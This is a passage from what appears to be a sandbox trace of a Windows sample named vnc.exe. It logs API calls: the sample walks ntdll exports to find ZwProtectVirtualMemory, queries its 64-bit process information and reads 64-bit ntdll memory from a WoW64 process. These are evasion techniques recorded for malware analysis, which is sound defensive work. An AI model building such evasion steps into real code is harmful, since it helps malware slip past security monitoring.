lpString2="ZwProtectVirtualMemory") returned -1 [0144.843] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="ZwProtectVirtualMemory") returned -1 [0144.843] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="ZwProtectVirtualMemory") returned -1 [0144.844] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="ZwProtectVirtualMemory") returned -1 [0144.844] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="ZwProtectVirtualMemory") returned -1 [0144.844] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="ZwProtectVirtualMemory") returned -1 [0144.844] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="ZwProtectVirtualMemory") returned -1 [0144.844] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="ZwProtectVirtualMemory") returned -1 [0144.844] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="ZwProtectVirtualMemory") returned -1 [0144.844] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="ZwProtectVirtualMemory") returned -1 [0144.844] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="ZwProtectVirtualMemory") returned -1 [0144.844] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="ZwProtectVirtualMemory") returned -1 [0144.844] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="ZwProtectVirtualMemory") returned -1 [0144.844] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="ZwProtectVirtualMemory") returned -1 [0144.844] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="ZwProtectVirtualMemory") returned -1 [0144.844] lstrcmpA (lpString1="KiUserInvertedFunctionTable", lpString2="ZwProtectVirtualMemory") returned -1 [0144.844] lstrcmpA (lpString1="LdrAccessResource", lpString2="ZwProtectVirtualMemory") returned -1 [0144.844] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0144.844] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="ZwProtectVirtualMemory") returned -1 [0144.844] lstrcmpA (lpString1="LdrAddRefDll", lpString2="ZwProtectVirtualMemory") returned -1 [0144.844] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="ZwProtectVirtualMemory") returned -1 [0144.844] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="ZwProtectVirtualMemory") returned -1 [0144.844] lstrcmpA (lpString1="LdrEnumResources", lpString2="ZwProtectVirtualMemory") returned -1 [0144.844] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="ZwProtectVirtualMemory") returned -1 [0144.844] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="ZwProtectVirtualMemory") returned -1 [0144.845] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="ZwProtectVirtualMemory") returned -1 [0144.845] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="ZwProtectVirtualMemory") returned -1 [0144.845] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="ZwProtectVirtualMemory") returned -1 [0144.845] lstrcmpA (lpString1="LdrFindResource_U", lpString2="ZwProtectVirtualMemory") returned -1 [0144.845] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="ZwProtectVirtualMemory") returned -1 [0144.845] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0144.845] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="ZwProtectVirtualMemory") returned -1 [0144.845] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="ZwProtectVirtualMemory") returned -1 [0144.845] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="ZwProtectVirtualMemory") returned -1 [0144.845] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="ZwProtectVirtualMemory") returned -1 [0144.845] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="ZwProtectVirtualMemory") returned -1 [0144.845] lstrcmpA (lpString1="LdrGetDllPath", lpString2="ZwProtectVirtualMemory") returned -1 [0144.845] lstrcmpA (lpString1="LdrGetFailureData", lpString2="ZwProtectVirtualMemory") returned -1 [0144.845] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="ZwProtectVirtualMemory") returned -1 [0144.845] lstrcmpA (lpString1="LdrGetKnownDllSectionHandle", lpString2="ZwProtectVirtualMemory") returned -1 [0144.845] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="ZwProtectVirtualMemory") returned -1 [0144.845] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="ZwProtectVirtualMemory") returned -1 [0144.845] lstrcmpA (lpString1="LdrGetProcedureAddressForCaller", lpString2="ZwProtectVirtualMemory") returned -1 [0144.845] lstrcmpA (lpString1="LdrInitShimEngineDynamic", lpString2="ZwProtectVirtualMemory") returned -1 [0144.845] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="ZwProtectVirtualMemory") returned -1 [0144.845] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="ZwProtectVirtualMemory") returned -1 [0144.845] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="ZwProtectVirtualMemory") returned -1 [0144.846] lstrcmpA (lpString1="LdrLoadDll", lpString2="ZwProtectVirtualMemory") returned -1 [0144.846] lstrcmpA (lpString1="LdrLockLoaderLock", lpString2="ZwProtectVirtualMemory") returned -1 [0144.846] lstrcmpA (lpString1="LdrOpenImageFileOptionsKey", lpString2="ZwProtectVirtualMemory") returned -1 [0144.846] lstrcmpA (lpString1="LdrProcessInitializationComplete", lpString2="ZwProtectVirtualMemory") returned -1 [0144.846] lstrcmpA (lpString1="LdrProcessRelocationBlock", lpString2="ZwProtectVirtualMemory") returned -1 [0144.846] lstrcmpA (lpString1="LdrProcessRelocationBlockEx", lpString2="ZwProtectVirtualMemory") returned -1 [0144.846] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptions", lpString2="ZwProtectVirtualMemory") returned -1 [0144.846] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptionsEx", lpString2="ZwProtectVirtualMemory") returned -1 [0144.846] lstrcmpA (lpString1="LdrQueryImageFileKeyOption", lpString2="ZwProtectVirtualMemory") returned -1 [0144.846] lstrcmpA (lpString1="LdrQueryModuleServiceTags", lpString2="ZwProtectVirtualMemory") returned -1 [0144.846] lstrcmpA (lpString1="LdrQueryOptionalDelayLoadedAPI", lpString2="ZwProtectVirtualMemory") returned -1 [0144.846] lstrcmpA (lpString1="LdrQueryProcessModuleInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0144.846] lstrcmpA (lpString1="LdrRegisterDllNotification", lpString2="ZwProtectVirtualMemory") returned -1 [0144.846] lstrcmpA (lpString1="LdrRemoveDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0144.846] lstrcmpA (lpString1="LdrRemoveLoadAsDataTable", lpString2="ZwProtectVirtualMemory") returned -1 [0144.846] lstrcmpA (lpString1="LdrResFindResource", lpString2="ZwProtectVirtualMemory") returned -1 [0144.846] lstrcmpA (lpString1="LdrResFindResourceDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0144.846] lstrcmpA (lpString1="LdrResGetRCConfig", lpString2="ZwProtectVirtualMemory") returned -1 [0144.846] lstrcmpA (lpString1="LdrResRelease", lpString2="ZwProtectVirtualMemory") returned -1 [0144.846] lstrcmpA (lpString1="LdrResSearchResource", lpString2="ZwProtectVirtualMemory") returned -1 [0144.846] lstrcmpA (lpString1="LdrResolveDelayLoadedAPI", lpString2="ZwProtectVirtualMemory") returned -1 [0144.847] lstrcmpA (lpString1="LdrResolveDelayLoadsFromDll", lpString2="ZwProtectVirtualMemory") returned -1 [0144.847] lstrcmpA (lpString1="LdrRscIsTypeExist", lpString2="ZwProtectVirtualMemory") returned -1 [0144.847] lstrcmpA (lpString1="LdrSetAppCompatDllRedirectionCallback", lpString2="ZwProtectVirtualMemory") returned -1 [0144.847] lstrcmpA (lpString1="LdrSetDefaultDllDirectories", lpString2="ZwProtectVirtualMemory") returned -1 [0144.847] lstrcmpA (lpString1="LdrSetDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0144.847] lstrcmpA (lpString1="LdrSetDllManifestProber", lpString2="ZwProtectVirtualMemory") returned -1 [0144.847] lstrcmpA (lpString1="LdrSetImplicitPathOptions", lpString2="ZwProtectVirtualMemory") returned -1 [0144.847] lstrcmpA (lpString1="LdrSetMUICacheType", lpString2="ZwProtectVirtualMemory") returned -1 [0144.847] lstrcmpA (lpString1="LdrShutdownProcess", lpString2="ZwProtectVirtualMemory") returned -1 [0144.847] lstrcmpA (lpString1="LdrShutdownThread", lpString2="ZwProtectVirtualMemory") returned -1 [0144.847] lstrcmpA (lpString1="LdrStandardizeSystemPath", lpString2="ZwProtectVirtualMemory") returned -1 [0144.847] lstrcmpA (lpString1="LdrSystemDllInitBlock", lpString2="ZwProtectVirtualMemory") returned -1 [0144.847] lstrcmpA (lpString1="LdrUnloadAlternateResourceModule", lpString2="ZwProtectVirtualMemory") returned -1 [0144.847] lstrcmpA (lpString1="LdrUnloadAlternateResourceModuleEx", lpString2="ZwProtectVirtualMemory") returned -1 [0144.847] lstrcmpA (lpString1="LdrUnloadDll", lpString2="ZwProtectVirtualMemory") returned -1 [0144.847] lstrcmpA (lpString1="LdrUnlockLoaderLock", lpString2="ZwProtectVirtualMemory") returned -1 [0144.847] lstrcmpA (lpString1="LdrUnregisterDllNotification", lpString2="ZwProtectVirtualMemory") returned -1 [0144.847] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksum", lpString2="ZwProtectVirtualMemory") returned -1 [0144.847] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksumEx", lpString2="ZwProtectVirtualMemory") returned -1 [0144.847] lstrcmpA (lpString1="LdrpResGetMappingSize", lpString2="ZwProtectVirtualMemory") returned -1 [0144.847] lstrcmpA (lpString1="LdrpResGetResourceDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0144.847] lstrcmpA (lpString1="MD4Final", lpString2="ZwProtectVirtualMemory") returned -1 [0144.847] lstrcmpA (lpString1="MD4Init", lpString2="ZwProtectVirtualMemory") returned -1 [0144.848] lstrcmpA (lpString1="MD4Update", lpString2="ZwProtectVirtualMemory") returned -1 [0144.848] lstrcmpA (lpString1="MD5Final", lpString2="ZwProtectVirtualMemory") returned -1 [0144.848] lstrcmpA (lpString1="MD5Init", lpString2="ZwProtectVirtualMemory") returned -1 [0144.848] lstrcmpA (lpString1="MD5Update", lpString2="ZwProtectVirtualMemory") returned -1 [0144.848] lstrcmpA (lpString1="NlsAnsiCodePage", lpString2="ZwProtectVirtualMemory") returned -1 [0144.848] lstrcmpA (lpString1="NlsMbCodePageTag", lpString2="ZwProtectVirtualMemory") returned -1 [0144.848] lstrcmpA (lpString1="NlsMbOemCodePageTag", lpString2="ZwProtectVirtualMemory") returned -1 [0144.848] lstrcmpA (lpString1="NtAcceptConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0144.848] lstrcmpA (lpString1="NtAccessCheck", lpString2="ZwProtectVirtualMemory") returned -1 [0144.848] lstrcmpA (lpString1="NtAccessCheckAndAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1 [0144.848] lstrcmpA (lpString1="NtAccessCheckByType", lpString2="ZwProtectVirtualMemory") returned -1 [0144.848] lstrcmpA (lpString1="NtAccessCheckByTypeAndAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1 [0144.848] lstrcmpA (lpString1="NtAccessCheckByTypeResultList", lpString2="ZwProtectVirtualMemory") returned -1 [0144.848] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1 [0144.848] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarmByHandle", lpString2="ZwProtectVirtualMemory") returned -1 [0144.848] lstrcmpA (lpString1="NtAddAtom", lpString2="ZwProtectVirtualMemory") returned -1 [0144.848] lstrcmpA (lpString1="NtAddAtomEx", lpString2="ZwProtectVirtualMemory") returned -1 [0144.848] lstrcmpA (lpString1="NtAddBootEntry", lpString2="ZwProtectVirtualMemory") returned -1 [0144.848] lstrcmpA (lpString1="NtAddDriverEntry", lpString2="ZwProtectVirtualMemory") returned -1 [0144.848] lstrcmpA (lpString1="NtAdjustGroupsToken", lpString2="ZwProtectVirtualMemory") returned -1 [0144.848] lstrcmpA (lpString1="NtAdjustPrivilegesToken", lpString2="ZwProtectVirtualMemory") returned -1 [0144.848] lstrcmpA (lpString1="NtAdjustTokenClaimsAndDeviceGroups", lpString2="ZwProtectVirtualMemory") returned -1 [0144.848] lstrcmpA (lpString1="NtAlertResumeThread", lpString2="ZwProtectVirtualMemory") returned -1 [0144.849] lstrcmpA (lpString1="NtAlertThread", lpString2="ZwProtectVirtualMemory") returned -1 [0144.849] lstrcmpA (lpString1="NtAlertThreadByThreadId", lpString2="ZwProtectVirtualMemory") returned -1 [0144.849] lstrcmpA (lpString1="NtAllocateLocallyUniqueId", lpString2="ZwProtectVirtualMemory") returned -1 [0144.849] lstrcmpA (lpString1="NtAllocateReserveObject", lpString2="ZwProtectVirtualMemory") returned -1 [0144.849] lstrcmpA (lpString1="NtAllocateUserPhysicalPages", lpString2="ZwProtectVirtualMemory") returned -1 [0144.849] lstrcmpA (lpString1="NtAllocateUuids", lpString2="ZwProtectVirtualMemory") returned -1 [0144.849] lstrcmpA (lpString1="NtAllocateVirtualMemory", lpString2="ZwProtectVirtualMemory") returned -1 [0144.849] lstrcmpA (lpString1="NtAlpcAcceptConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0144.849] lstrcmpA (lpString1="NtAlpcCancelMessage", lpString2="ZwProtectVirtualMemory") returned -1 [0144.849] lstrcmpA (lpString1="NtAlpcConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0144.849] lstrcmpA (lpString1="NtAlpcConnectPortEx", lpString2="ZwProtectVirtualMemory") returned -1 [0144.849] lstrcmpA (lpString1="NtAlpcCreatePort", lpString2="ZwProtectVirtualMemory") returned -1 [0144.849] lstrcmpA (lpString1="NtAlpcCreatePortSection", lpString2="ZwProtectVirtualMemory") returned -1 [0144.849] lstrcmpA (lpString1="NtAlpcCreateResourceReserve", lpString2="ZwProtectVirtualMemory") returned -1 [0144.849] lstrcmpA (lpString1="NtAlpcCreateSectionView", lpString2="ZwProtectVirtualMemory") returned -1 [0144.849] lstrcmpA (lpString1="NtAlpcCreateSecurityContext", lpString2="ZwProtectVirtualMemory") returned -1 [0144.849] lstrcmpA (lpString1="NtAlpcDeletePortSection", lpString2="ZwProtectVirtualMemory") returned -1 [0144.849] lstrcmpA (lpString1="NtAlpcDeleteResourceReserve", lpString2="ZwProtectVirtualMemory") returned -1 [0144.849] lstrcmpA (lpString1="NtAlpcDeleteSectionView", lpString2="ZwProtectVirtualMemory") returned -1 [0144.849] lstrcmpA (lpString1="NtAlpcDeleteSecurityContext", lpString2="ZwProtectVirtualMemory") returned -1 [0144.849] lstrcmpA (lpString1="NtAlpcDisconnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0144.849] lstrcmpA (lpString1="NtAlpcImpersonateClientContainerOfPort", lpString2="ZwProtectVirtualMemory") returned -1 [0144.850] lstrcmpA (lpString1="NtAlpcImpersonateClientOfPort", lpString2="ZwProtectVirtualMemory") returned -1 [0144.850] lstrcmpA (lpString1="NtAlpcOpenSenderProcess", lpString2="ZwProtectVirtualMemory") returned -1 [0144.850] lstrcmpA (lpString1="NtAlpcOpenSenderThread", lpString2="ZwProtectVirtualMemory") returned -1 [0144.850] lstrcmpA (lpString1="NtAlpcQueryInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0144.850] lstrcmpA (lpString1="NtAlpcQueryInformationMessage", lpString2="ZwProtectVirtualMemory") returned -1 [0144.850] lstrcmpA (lpString1="NtAlpcRevokeSecurityContext", lpString2="ZwProtectVirtualMemory") returned -1 [0144.850] lstrcmpA (lpString1="NtAlpcSendWaitReceivePort", lpString2="ZwProtectVirtualMemory") returned -1 [0144.850] lstrcmpA (lpString1="NtAlpcSetInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0144.850] lstrcmpA (lpString1="NtApphelpCacheControl", lpString2="ZwProtectVirtualMemory") returned -1 [0144.850] lstrcmpA (lpString1="NtAreMappedFilesTheSame", lpString2="ZwProtectVirtualMemory") returned -1 [0144.850] lstrcmpA (lpString1="NtAssignProcessToJobObject", lpString2="ZwProtectVirtualMemory") returned -1 [0144.850] lstrcmpA (lpString1="NtAssociateWaitCompletionPacket", lpString2="ZwProtectVirtualMemory") returned -1 [0144.850] lstrcmpA (lpString1="NtCallbackReturn", lpString2="ZwProtectVirtualMemory") returned -1 [0144.850] lstrcmpA (lpString1="NtCancelIoFile", lpString2="ZwProtectVirtualMemory") returned -1 [0144.850] lstrcmpA (lpString1="NtCancelIoFileEx", lpString2="ZwProtectVirtualMemory") returned -1 [0144.851] lstrcmpA (lpString1="NtCancelSynchronousIoFile", lpString2="ZwProtectVirtualMemory") returned -1 [0144.851] lstrcmpA (lpString1="NtCancelTimer", lpString2="ZwProtectVirtualMemory") returned -1 [0144.851] lstrcmpA (lpString1="NtCancelTimer2", lpString2="ZwProtectVirtualMemory") returned -1 [0144.851] lstrcmpA (lpString1="NtCancelWaitCompletionPacket", lpString2="ZwProtectVirtualMemory") returned -1 [0144.851] lstrcmpA (lpString1="NtClearEvent", lpString2="ZwProtectVirtualMemory") returned -1 [0144.851] lstrcmpA (lpString1="NtClose", lpString2="ZwProtectVirtualMemory") returned -1 [0144.851] lstrcmpA (lpString1="NtCloseObjectAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1 [0144.851] lstrcmpA (lpString1="NtCommitComplete", lpString2="ZwProtectVirtualMemory") returned -1 [0144.851] lstrcmpA (lpString1="NtCommitEnlistment", lpString2="ZwProtectVirtualMemory") returned -1 [0144.851] lstrcmpA (lpString1="NtCommitTransaction", lpString2="ZwProtectVirtualMemory") returned -1 [0144.851] lstrcmpA (lpString1="NtCompactKeys", lpString2="ZwProtectVirtualMemory") returned -1 [0144.851] lstrcmpA (lpString1="NtCompareObjects", lpString2="ZwProtectVirtualMemory") returned -1 [0144.851] lstrcmpA (lpString1="NtCompareTokens", lpString2="ZwProtectVirtualMemory") returned -1 [0144.851] lstrcmpA (lpString1="NtCompleteConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0144.851] lstrcmpA (lpString1="NtCompressKey", lpString2="ZwProtectVirtualMemory") returned -1 [0144.851] lstrcmpA (lpString1="NtConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0144.852] VirtualFree (lpAddress=0xa90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.957] GetModuleHandleW (lpModuleName="NTDLL.DLL") returned 0x778f0000 [0144.958] GetProcAddress (hModule=0x778f0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77968930 [0144.958] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x17c, ProcessInformationClass=0x0, ProcessInformation64=0x19ef54, ProcessInformationLength=0x30, ReturnLength=0x19efac | out: ProcessInformation64=0x19ef54, ReturnLength=0x19efac) returned 0x0 [0144.958] LocalAlloc (uFlags=0x0, uBytes=0x200) returned 0x629120 [0144.958] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x61df68 [0144.958] LocalFree (hMem=0x629120) returned 0x0 [0144.958] LocalFree (hMem=0x61df68) returned 0x0 [0144.958] VirtualAlloc (lpAddress=0x0, dwSize=0x5a4, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000 [0144.959] GetModuleHandleW (lpModuleName="NTDLL.DLL") returned 0x778f0000 [0144.959] GetProcAddress (hModule=0x778f0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77968930 [0144.959] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x17c, ProcessInformationClass=0x0, ProcessInformation64=0x19ef54, ProcessInformationLength=0x30, ReturnLength=0x19efac | out: ProcessInformation64=0x19ef54, ReturnLength=0x19efac) returned 0x0 [0144.959] LocalAlloc (uFlags=0x0, uBytes=0x200) returned 0x629120 [0144.959] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x61df68 [0144.959] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x380000, Buffer=0x0, BufferSize=0x61df68, NumberOfBytesRead=0x28 | out: Buffer=0x0, NumberOfBytesRead=0x28) returned 0x0 [0144.959] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28c45200, Buffer=0x7ffb, BufferSize=0x61df90, NumberOfBytesRead=0x40 | out: Buffer=0x7ffb, NumberOfBytesRead=0x40) returned 0x0 [0144.959] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e1c70, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0144.959] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e18a8, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x58 | out: Buffer=0x0, NumberOfBytesRead=0x58) returned 0x0 [0144.959] StrRChrA (lpStart="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\vnc.exe", lpEnd=0x0, wMatch=0x5c) returned="\\vnc.exe" [0144.959] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e1af0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0144.959] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e19f0, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x3a | out: Buffer=0x0, NumberOfBytesRead=0x3a) returned 0x0 [0144.960] StrRChrA (lpStart="C:\\Windows\\SYSTEM32\\ntdll.dll", lpEnd=0x0, wMatch=0x5c) returned="\\ntdll.dll" [0144.960] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2110, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0144.960] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2290, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x3a | out: Buffer=0x0, NumberOfBytesRead=0x3a) returned 0x0 [0144.960] StrRChrA (lpStart="C:\\Windows\\system32\\wow64.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64.dll" [0144.960] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e23f0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0144.960] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2570, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x40 | out: Buffer=0x0, NumberOfBytesRead=0x40) returned 0x0 [0144.960] StrRChrA (lpStart="C:\\Windows\\system32\\wow64win.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64win.dll" [0144.960] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e25c0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0144.960] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2090, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x40 | out: Buffer=0x0, NumberOfBytesRead=0x40) returned 0x0 [0144.960] StrRChrA (lpStart="C:\\Windows\\system32\\wow64cpu.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64cpu.dll" [0144.960] LocalFree (hMem=0x629120) returned 0x0 [0144.960] LocalFree (hMem=0x61df68) returned 0x0 [0144.960] lstrcmpiA (lpString1="vnc.exe", lpString2="NTDLL.DLL") returned 1 [0144.960] StrChrA (lpStart="vnc.exe", wMatch=0x2e) returned=".exe" [0144.960] lstrcmpiA (lpString1="vnc", lpString2="NTDLL.DLL") returned 1 [0144.960] lstrcmpiA (lpString1="ntdll.dll", lpString2="NTDLL.DLL") returned 0 [0144.961] VirtualFree (lpAddress=0x5f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.961] VirtualAlloc (lpAddress=0x0, dwSize=0x1c1000, flAllocationType=0x3000, flProtect=0x4) returned 0xa90000 [0144.961] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b00000, Buffer=0x7ffb, BufferSize=0xa90000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.961] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b01000, Buffer=0x7ffb, BufferSize=0xa91000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.962] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b02000, Buffer=0x7ffb, BufferSize=0xa92000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.962] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b03000, Buffer=0x7ffb, BufferSize=0xa93000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.962] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b04000, Buffer=0x7ffb, BufferSize=0xa94000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.962] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b05000, Buffer=0x7ffb, BufferSize=0xa95000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.962] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b06000, Buffer=0x7ffb, BufferSize=0xa96000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.963] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b07000, Buffer=0x7ffb, BufferSize=0xa97000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.963] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b08000, Buffer=0x7ffb, BufferSize=0xa98000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.963] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b09000, Buffer=0x7ffb, BufferSize=0xa99000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.963] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0a000, Buffer=0x7ffb, BufferSize=0xa9a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.964] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0b000, Buffer=0x7ffb, BufferSize=0xa9b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.964] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0c000, Buffer=0x7ffb, BufferSize=0xa9c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.964] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0d000, Buffer=0x7ffb, BufferSize=0xa9d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.964] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0e000, Buffer=0x7ffb, BufferSize=0xa9e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.964] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0f000, Buffer=0x7ffb, BufferSize=0xa9f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.965] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b10000, Buffer=0x7ffb, BufferSize=0xaa0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.965] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b11000, Buffer=0x7ffb, BufferSize=0xaa1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.965] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b12000, Buffer=0x7ffb, BufferSize=0xaa2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.226] 